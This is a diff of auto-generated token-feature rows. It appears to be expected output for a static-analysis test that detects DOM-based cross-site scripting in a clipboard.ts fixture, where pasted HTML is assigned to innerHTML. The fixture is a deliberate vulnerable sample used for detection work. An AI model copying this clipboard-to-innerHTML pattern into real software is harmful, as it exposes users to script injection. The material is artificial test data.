src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:49 | e.clipb ... getData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:49 | e.clipb ... getData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | e.clipb ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | e.clipb ... /html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | e.clipb ... /html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | exceptional return of e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | exceptional return of e.clipb ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | exceptional return of e.clipb ... /html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | exceptional return of e.clipb ... /html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:62 | exceptional return of e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:29:71:41 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:29:71:41 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:29:71:41 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:29:71:41 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:29:71:41 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:43:71:49 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:43:71:49 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:43:71:49 | getData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:43:71:49 | getData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:43:71:49 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | CalleeFlexibleAccessPath | e.clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12604,6 +94701,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:71:51:71:61 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:21 | container | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:21 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:21 | container | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:21 | container | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:21 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | contain ... 'html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | contain ... 'html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | contain ... 'html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | contain ... 'html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | contain ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | container | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | container | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | container | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | container | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:13:72:54 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:32 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:32 | document | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:32 | document | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:32 | document | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:32 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:46 | documen ... Element | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:46 | documen ... Element | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:46 | documen ... Element | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:46 | documen ... Element | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:46 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | documen ... 'html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | documen ... 'html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | documen ... 'html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | documen ... 'html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | documen ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | exceptional return of documen ... 'html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | exceptional return of documen ... 'html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | exceptional return of documen ... 'html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | exceptional return of documen ... 'html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:25:72:54 | exceptional return of documen ... 'html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:34:72:46 | createElement | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:34:72:46 | createElement | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:34:72:46 | createElement | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:34:72:46 | createElement | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:72:34:72:46 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12612,12 +94749,72 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:72:48:72:53 | 'html' | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:15 | container | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:15 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:15 | container | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:15 | container | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:15 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:25 | container.innerHTML | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:25 | container.innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:25 | container.innerHTML | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:25 | container.innerHTML | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:25 | container.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:39 | contain ... pedHtml | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:39 | contain ... pedHtml | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:39 | contain ... pedHtml | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:39 | contain ... pedHtml | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:7:73:39 | contain ... pedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:17:73:25 | innerHTML | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:17:73:25 | innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:17:73:25 | innerHTML | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:17:73:25 | innerHTML | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:73:17:73:25 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:73:29:73:39 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:16 | imgs | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:16 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:16 | imgs | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:16 | imgs | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:16 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs = ... ('img') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs = ... ('img') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs = ... ('img') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs = ... ('img') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:13:74:56 | imgs = ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:28 | container | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:28 | container | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:28 | container | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:28 | container | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:28 | container | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:49 | contain ... TagName | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:49 | contain ... TagName | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:49 | contain ... TagName | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:49 | contain ... TagName | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:49 | contain ... TagName | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | contain ... ('img') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | contain ... ('img') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | contain ... ('img') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | contain ... ('img') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | contain ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | exceptional return of contain ... ('img') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | exceptional return of contain ... ('img') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | exceptional return of contain ... ('img') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | exceptional return of contain ... ('img') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:20:74:56 | exceptional return of contain ... ('img') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:30:74:49 | getElementsByTagName | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:30:74:49 | getElementsByTagName | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:30:74:49 | getElementsByTagName | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:30:74:49 | getElementsByTagName | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:74:30:74:49 | getElementsByTagName | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | CalleeFlexibleAccessPath | container.getElementsByTagName | | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12626,6 +94823,96 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:74:51:74:55 | 'img' | receiverName | container | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:14 | imgs | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:14 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:14 | imgs | 